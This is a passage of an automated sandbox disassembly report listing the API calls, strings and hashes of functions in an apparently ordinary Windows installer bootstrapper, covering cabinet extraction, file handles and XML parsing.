Msi.dll, xrefs: 000D29C5
MsiDetermineApplicablePatchesW, xrefs: 000D2A07

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AddressProc$ErrorLast$DirectorySystem
String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
API String ID: 2510051996-1735120554
Opcode ID: f792221256ee2b5765ca031ac9e0c80d42076cda49aad5bf6bcbd8b229df5953
Instruction ID: 7dfb3212366b5b8ba7b263d3102b9427362009f46859572b2932704513e7a452
Opcode Fuzzy Hash: f792221256ee2b5765ca031ac9e0c80d42076cda49aad5bf6bcbd8b229df5953
Instruction Fuzzy Hash: 7631EAB0641208AFFB58DF25EC52A793BB5FB44700741452EE506D6EA0D7BEA900FF40

Function 000CFBAD Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 74libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 000CFBD5
GetProcAddress.KERNEL32(SystemFunction041), ref: 000CFBE7
GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 000CFC2A
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 000CFC3E
GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 000CFC76
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 000CFC8A

Strings

CryptProtectMemory, xrefs: 000CFC1F
`+?s, xrefs: 000CFBE9, 000CFBF0, 000CFC78
AdvApi32.dll, xrefs: 000CFBB4
CryptUnprotectMemory, xrefs: 000CFC6B
cryputil.cpp, xrefs: 000CFC5F
SystemFunction041, xrefs: 000CFBD7
Crypt32.dll, xrefs: 000CFC0B
SystemFunction040, xrefs: 000CFBCA

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AddressProc$ErrorLast
String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$`+?s$cryputil.cpp
API String ID: 4214558900-776468437
Opcode ID: 38a26367ff99c467ab93ee5716c1557288a644cf75c49590a9c6a7aa7ae2a7cb
Instruction ID: 72adc6bdf5ce41d4eb27bce38c3aad1c7b93045a188a5cb80f8d75464b4ccd50
Opcode Fuzzy Hash: 38a26367ff99c467ab93ee5716c1557288a644cf75c49590a9c6a7aa7ae2a7cb
Instruction Fuzzy Hash: 2A218671A41B2B9BF7215B66DE45F3A79D1AB10B40F020135EE10EA960E76DCC00FE91

Function 000B1484 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 103COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,0009C285,?,00000000,?,0009C319), ref: 000B14BB
GetLastError.KERNEL32(?,0009C285,?,00000000,?,0009C319,000952FD,?,?,0009533D,0009533D,00000000,?,00000000), ref: 000B14C4

Strings

Failed to create extraction thread., xrefs: 000B1584
wininet.dll, xrefs: 000B149A
Failed to wait for operation complete., xrefs: 000B1597
cabextract.cpp, xrefs: 000B14E8, 000B152E, 000B157A
Failed to create operation complete event., xrefs: 000B1538
Failed to copy file name., xrefs: 000B14A6
Failed to create begin operation event., xrefs: 000B14F2

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CreateErrorEventLast
String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
API String ID: 545576003-938279966
Opcode ID: 9b6e0be8351d3cee3e2b6c338dd25339de71e54611525ffb11a6c5b742555ec1
Instruction ID: b20cdb938b985c6965cc48eca8c3ea0a14b4395caaf2f3dee35b9e9e93f74b48
Opcode Fuzzy Hash: 9b6e0be8351d3cee3e2b6c338dd25339de71e54611525ffb11a6c5b742555ec1
Instruction Fuzzy Hash: E121B1B2B44B25BEF731667A5C41BE77ADCEF487A0B020226BD05FA581E664EC0085F5

Function 000B0627 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 103fileCOMMON

Download Yara Rule

APIs

CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 000B0657
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 000B066F
GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 000B0674
DuplicateHandle.KERNELBASE(00000000,?,?), ref: 000B0677
GetLastError.KERNEL32(?,?), ref: 000B0681
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 000B06F0
GetLastError.KERNEL32(?,?), ref: 000B06FD

Strings

<the>.cab, xrefs: 000B0650
Failed to duplicate handle to cab container., xrefs: 000B06AF
Failed to add virtual file pointer for cab container., xrefs: 000B06D6
cabextract.cpp, xrefs: 000B06A5, 000B0721
Failed to open cabinet file: %hs, xrefs: 000B072E

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
API String ID: 3030546534-3446344238
Opcode ID: 5ac89e4ff6641a971573e98b81392282880a37dad48b4bffe9a0d140b5eab3e0
Instruction ID: 10c4e687994bd1199547ed7cd6b6a3d836b7d4ad67f2f36a90bb80818e70f80d
Opcode Fuzzy Hash: 5ac89e4ff6641a971573e98b81392282880a37dad48b4bffe9a0d140b5eab3e0
Instruction Fuzzy Hash: 8031E172A41225FFEB209BA68C49EDB7BA8EF09760F010126FD08F7150D7249D108AF4

Function 000A6859 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(000000FF,00000000,00000001,00000002,?,00000000,?,?,00094D0B,?,?), ref: 000A6879
GetCurrentProcess.KERNEL32(?,00000000,?,?,00094D0B,?,?), ref: 000A687F
DuplicateHandle.KERNELBASE(00000000,?,?,00094D0B,?,?), ref: 000A6882
GetLastError.KERNEL32(?,?,00094D0B,?,?), ref: 000A688C
CloseHandle.KERNEL32(000000FF,?,00094D0B,?,?), ref: 000A6905

Strings

burn.filehandle.attached, xrefs: 000A68D2
Failed to duplicate file handle for attached container., xrefs: 000A68BA
%ls -%ls=%u, xrefs: 000A68D9
Failed to append the file handle to the command line., xrefs: 000A68ED
core.cpp, xrefs: 000A68B0

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CurrentHandleProcess$CloseDuplicateErrorLast
String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to duplicate file handle for attached container.$burn.filehandle.attached$core.cpp
API String ID: 4224961946-4196573879
Opcode ID: dc5b59b07e562b1916a5366bfdb1353f0668a4d420b7785efddc77bf92e2850d
Instruction ID: 60ff0a804d04ca9d23e73c510531f7669a86456260466aae62fd79ad34b0fa5a
Opcode Fuzzy Hash: dc5b59b07e562b1916a5366bfdb1353f0668a4d420b7785efddc77bf92e2850d
Instruction Fuzzy Hash: E1118431A41719FBDB10ABB99D05A9E7BACAF05B70F110326FD20F72D0DB758D1196A0

Function 000A6915 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000005,?,00000003,00000080,00000000,?,00000000,?,?,?), ref: 000A694B
CloseHandle.KERNEL32(00000000), ref: 000A69BB

Strings

%ls -%ls=%u, xrefs: 000A6963, 000A6995
Failed to append the file handle to the command line., xrefs: 000A6977
burn.filehandle.self, xrefs: 000A695C, 000A698E
Failed to append the file handle to the obfuscated command line., xrefs: 000A69A9

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self
API String ID: 3498533004-3263533295
Opcode ID: beb4bb345c183671060652c4b9e5e06d7a501b404d4db1ec0862a26d0b7913f0
Instruction ID: 7432df762c221faa0699fffacb3b0abb01b8f4798a63d36d0b218b1f9f8be01b
Opcode Fuzzy Hash: beb4bb345c183671060652c4b9e5e06d7a501b404d4db1ec0862a26d0b7913f0
Instruction Fuzzy Hash: 26110832601714BFDB205AA99C05F9F7BACDB46B30F050361FE24BB2E1DB71581186A1

Function 000D076C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32(?,00000008,?,000952B5,00000000,?,?,?,?,?,?,?,000A74AB,00000000), ref: 000D078A
GetLastError.KERNEL32(?,?,?,?,?,?,?,000A74AB,00000000), ref: 000D0794
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,000A74AB,00000000), ref: 000D07C6
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,000A74AB,00000000), ref: 000D081D

Strings

procutil.cpp, xrefs: 000D080B

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Token$CloseErrorHandleInformationLastOpenProcess
String ID: procutil.cpp
API String ID: 3370771294-1178289305
Opcode ID: 03b5fd4f7430305fd129c1d6083fe93df01ca6b1dfa92320ffc658425e407a11
Instruction ID: c70a149ac9b2c46f8cbbaf7a0b5193fac10c7184ba1c3f04c6003a9828745e52
Opcode Fuzzy Hash: 03b5fd4f7430305fd129c1d6083fe93df01ca6b1dfa92320ffc658425e407a11
Instruction Fuzzy Hash: B4215071D41328EBEB209B958C44B9EBBE8EF54710F114167AD19EB250D6708E04EBF0

Function 000D343B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 000D344A
InterlockedIncrement.KERNEL32(000FB6D8), ref: 000D3467
CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,000FB6C8,?,?,?,?,?,?), ref: 000D3482
CLSIDFromProgID.OLE32(MSXML.DOMDocument,000FB6C8,?,?,?,?,?,?), ref: 000D348E

Strings

MSXML.DOMDocument, xrefs: 000D3489
Msxml2.DOMDocument, xrefs: 000D347D

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: FromProg$IncrementInitializeInterlocked
String ID: MSXML.DOMDocument$Msxml2.DOMDocument
API String ID: 2109125048-2356320334
Opcode ID: 6a0522a834ba7fca60d0b61f54343c39e59bcabe75a420ba7033b9727314742f
Instruction ID: 9673313070089f342edb86b04eaf4aa1a0f49a7063e4aa35a25c43a61c14b450
Opcode Fuzzy Hash: 6a0522a834ba7fca60d0b61f54343c39e59bcabe75a420ba7033b9727314742f
Instruction Fuzzy Hash: 0AF0A02174133997E7224BA5EC0DB273EA4AB81F65F01002FEE00E5794D36CA941DEB2

Function 000D4932 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 000D495A
GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 000D4989
GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 000D49B3
GetLastError.KERNEL32(00000000,000DB790,?,?,?,00000000,00000000,00000000), ref: 000D49F4
GlobalFree.KERNEL32(00000000), ref: 000D4A28

Strings

fileutil.cpp, xrefs: 000D4978, 000D49D1

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLast$Global$AllocFree
String ID: fileutil.cpp
API String ID: 1145190524-2967768451
Opcode ID: 3e73e2c285485c37c89258f684c7dd2bfe86790aedef99d780064ea41cf4f6b7
Instruction ID: ef4a264c113826af87de4a8acf82eaf1b16782e785da131dbedaa0b37a0ab982
Opcode Fuzzy Hash: 3e73e2c285485c37c89258f684c7dd2bfe86790aedef99d780064ea41cf4f6b7
Instruction Fuzzy Hash: F3219535A40329ABDB219BAA8C45AEFFBA8EF84360F114117FD05E7351D735CD0096B1

Function 000B07E4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 99COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 000B088A
GetLastError.KERNEL32(?,?,?), ref: 000B0894

Strings

Failed to move file pointer 0x%x bytes., xrefs: 000B08C5
cabextract.cpp, xrefs: 000B08B8
Invalid seek type., xrefs: 000B0820

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
API String ID: 2976181284-417918914
Opcode ID: 48be79b96fd09b295c05ce5e9ce5fcc244025b3fd4ac2b0e02b1f4baf97cf5c0
Instruction ID: 83b4ce3f35d9cdfbbc5411574fdc1bbc1ac4652359ae27b57e8d65511bae2d70
Opcode Fuzzy Hash: 48be79b96fd09b295c05ce5e9ce5fcc244025b3fd4ac2b0e02b1f4baf97cf5c0
Instruction Fuzzy Hash: BE318371A0061AFFDB14DF69CC859AAB7A9FF08710B10822AF919A7651D730EE10CBD0

Function 000D31C7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 000D31DD
SysAllocString.OLEAUT32(?), ref: 000D31F9
VariantClear.OLEAUT32(?), ref: 000D3280
SysFreeString.OLEAUT32(00000000), ref: 000D328B

Strings

xmlutil.cpp, xrefs: 000D3210

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: xmlutil.cpp
API String ID: 760788290-1270936966
Opcode ID: a4a594b73e330addc783f4c54a1df2b810ab386b7fde2cbe2bee9a8542bb3660
Instruction ID: 64a111c68522130cfa33a34275517da428a0e042f21d52bfb95b70c143bf8dc2
Opcode Fuzzy Hash: a4a594b73e330addc783f4c54a1df2b810ab386b7fde2cbe2bee9a8542bb3660
Instruction Fuzzy Hash: 3B218032D01319EBDB20DBA8C849EBEBBB8AF44750F154159F905AB210CB359E009BA1

Function 00094013 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(0009533D,000953B5,00000000,00000000,?,000A9EE4,00000000,00000000,0009533D,00000000,000952B5,00000000,?,=S,0009D4AC,=S), ref: 00094021
GetLastError.KERNEL32(?,000A9EE4,00000000,00000000,0009533D,00000000,000952B5,00000000,?,=S,0009D4AC,=S,00000000,00000000), ref: 0009402F
CreateDirectoryW.KERNEL32(0009533D,000953B5,00095381,?,000A9EE4,00000000,00000000,0009533D,00000000,000952B5,00000000,?,=S,0009D4AC,=S,00000000), ref: 00094097
GetLastError.KERNEL32(?,000A9EE4,00000000,00000000,0009533D,00000000,000952B5,00000000,?,=S,0009D4AC,=S,00000000,00000000), ref: 000940A1

Strings

dirutil.cpp, xrefs: 000940CF

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: dirutil.cpp
API String ID: 1375471231-2193988115
Opcode ID: f7acdd24c67d09efd4f25da469eab8d8250dbca3632e0c7a153bac10d6e84935
Instruction ID: dc64365859036aed3c4a1f30fb9d7d9f891edb32f84b4c541df1a92ae5095b87
Opcode Fuzzy Hash: f7acdd24c67d09efd4f25da469eab8d8250dbca3632e0c7a153bac10d6e84935
Instruction Fuzzy Hash: 0D11D236A04321E6EF311AA14C44F7FB698EFD4B60F114226FF45EB190E7758C12B2A1

Function 000955B6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,00000000,00000007,0009648B,0009648B,?,0009554A,?,?,00000000), ref: 000955F2
GetLastError.KERNEL32(?,0009554A,?,?,00000000,?,00000000,0009648B,?,00097DDC,?,?,?,?,?), ref: 00095621

Strings

variable.cpp, xrefs: 00095645
Failed to compare strings., xrefs: 0009564F
version.dll, xrefs: 000955E4

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CompareErrorLastString
String ID: Failed to compare strings.$variable.cpp$version.dll
API String ID: 1733990998-4228644734
Opcode ID: 6a597c1ddb65867d10bd3690ee96964c9f6f546693b6e5de7cac0af2d265f7cf
Instruction ID: 9ecf6e8e271b9074cfc88a42eb0790e1e5b15581e7a366f85236d60bee864c0c
Opcode Fuzzy Hash: 6a597c1ddb65867d10bd3690ee96964c9f6f546693b6e5de7cac0af2d265f7cf
Instruction Fuzzy Hash: E0212632605614EBDB118FADCC41A6AB7E4EF09761F61031AFD14EB3D0DA30DE0197A0

Function 000B074E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000B114F: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,000B077D,?,?,?), ref: 000B1177
Part of subcall function 000B114F: GetLastError.KERNEL32(?,000B077D,?,?,?), ref: 000B1181

ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 000B078B
GetLastError.KERNEL32 ref: 000B0795

Strings

cabextract.cpp, xrefs: 000B07B9
Failed to read during cabinet extraction., xrefs: 000B07C3

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorFileLast$PointerRead
String ID: Failed to read during cabinet extraction.$cabextract.cpp
API String ID: 2170121939-2426083571
Opcode ID: df9f28bb85e65b44b4b2aee335a22306f04477448a7fa58b9c9c5555d5e51384
Instruction ID: 00caccebe4269612be19193d0e736ced25fb088cc908b7ebe8e257032c2e1e53
Opcode Fuzzy Hash: df9f28bb85e65b44b4b2aee335a22306f04477448a7fa58b9c9c5555d5e51384
Instruction Fuzzy Hash: 1901A572A00264EBDB109FA9DC05EDA7BA9FF09760F010119FD08E7650D735DA109BE4

Function 000B114F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,000B077D,?,?,?), ref: 000B1177
GetLastError.KERNEL32(?,000B077D,?,?,?), ref: 000B1181

Strings

cabextract.cpp, xrefs: 000B11A5
Failed to move to virtual file pointer., xrefs: 000B11AF

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move to virtual file pointer.$cabextract.cpp
API String ID: 2976181284-3005670968
Opcode ID: c1509b75a6a9fa607c50330eeea65de1121fc8f8d74cc384eb08a11a04e3c144
Instruction ID: a246eb5a94547b6a1fd4377489b67164f6e07b72bc82f3491bbc942eb3ee44c4
Opcode Fuzzy Hash: c1509b75a6a9fa607c50330eeea65de1121fc8f8d74cc384eb08a11a04e3c144
Instruction Fuzzy Hash: A201F236640225BBDB215AAA9C04EC7FF99EF017B0B01812AFE1C9A150D7359C10CAE4

Function 000D3DB5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 000D3E5E
GetLastError.KERNEL32 ref: 000D3EC1

Strings

fileutil.cpp, xrefs: 000D3EE5

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: fileutil.cpp
API String ID: 1948546556-2967768451
Opcode ID: 8dfc86293f67c570ad4aa8594260b1cb408be6c0ddcdaece5ec2498fa47a9f14
Instruction ID: c4c96cf85b7bbe2eb1514cf2e632d91f035d7f0f12aadad987d72858935b9510
Opcode Fuzzy Hash: 8dfc86293f67c570ad4aa8594260b1cb408be6c0ddcdaece5ec2498fa47a9f14
Instruction Fuzzy Hash: A0413D71E003699BDB21DF58C8407EAB7A4EF48751F0041A7B949E7380D7B49EC4DBA1

Function 000D4CEE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,000D3E85,?,?,?), ref: 000D4D12
GetLastError.KERNEL32(?,?,000D3E85,?,?,?), ref: 000D4D1C

Strings

fileutil.cpp, xrefs: 000D4D44

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

